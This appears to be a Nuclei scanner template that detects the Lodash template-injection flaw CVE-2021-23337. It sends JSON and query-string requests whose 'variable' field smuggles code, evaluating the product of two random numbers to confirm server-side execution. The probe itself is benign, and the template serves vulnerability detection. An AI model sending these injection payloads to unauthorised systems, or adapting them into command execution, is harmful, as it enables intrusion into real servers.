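# Nuclei template for CVE-2021-23337 (Lodash `template` injection).
# Detection approach: ask the target to evaluate the product of two random
# integers and match on the computed value, so a hit means server-side
# evaluation rather than a reflected payload.
id: CVE-2021-23337

info:
  name: Lodash Template - Server-Side Template Injection (RCE)
  author: DhiyaneshDk
  severity: high
  description: |
    Lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function.
  impact: |
    Attackers can execute arbitrary commands on the host system, leading to full system compromise.
  remediation: |
    Update to version 4.17.21 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-23337
    - https://security.snyk.io/vuln/SNYK-JS-LODASH-1040724
    - https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c
    - https://github.com/advisories/GHSA-35jh-r3h4-6jhm
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2021-23337
    cwe-id: CWE-94
    epss-score: 0.04314
    epss-percentile: 0.89076
  metadata:
    verified: true
    # Upper bound on requests sent per target: one per raw request below.
    max-request: 2
    vendor: lodash
    product: lodash
    shodan-query: http.component:"lodash"
    fofa-query: body="lodash"
  tags: cve,cve2021,lodash,ssti,rce,nodejs,javascript

# Short-circuit: the second request is only attempted when the first one
# does not match (flow expressions are evaluated left to right).
flow: http(1) || http(2)

# Fresh random operands per run, so the expected value cannot be satisfied
# by a static page or by the target merely echoing the input back.
variables:
  randA: "{{rand_int(1000, 9999)}}"
  randB: "{{rand_int(1000, 9999)}}"

http:
  # Variant 1: JSON body where the template and its variable name are
  # attacker-controlled (the blank line separates headers from the body).
  - raw:
      - |
        POST /template HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"template":"<%= name %>","variable":") { return String({{randA}}*{{randB}}) }; with(obj","data":{"name":"test"}}

    matchers-condition: and
    matchers:
      # Match on the evaluated product, not the literal expression: this
      # distinguishes real evaluation from simple reflection of the input.
      - type: word
        part: body
        words:
          - "{{to_number(randA)*to_number(randB)}}"

      - type: status
        status:
          - 200

    extractors:
      # NOTE(review): "[0-9]+" captures any digit run in the body, not only
      # the evaluated product; the matcher above is what confirms the finding.
      - type: regex
        part: body
        name: eval_result
        regex:
          - "[0-9]+"

  # Variant 2: same probe delivered through a URL-encoded query parameter.
  - raw:
      - |
        GET /render?tpl=hello&variable=)%7Breturn+String({{randA}}*{{randB}})%7D%3Bwith(obj HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{to_number(randA)*to_number(randB)}}"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        name: eval_result
        regex:
          - "[0-9]+"

# Template signature over the body above; it must stay on one comment line.
# Editing the template (including comments) invalidates it, so re-sign with
# Nuclei's template signing tooling after any change.
# digest: 4a0a00473045022100ac5807c4c01b0dd29b831be23e51c1ae42cdf9d7660d2bc629ab4df6ad11f581022018723c79fe0e252a82f4386ae574149c3a8a57c2b6c988d6704ef4ce31570f2a:922c64590222798bb761d5b6d8e72950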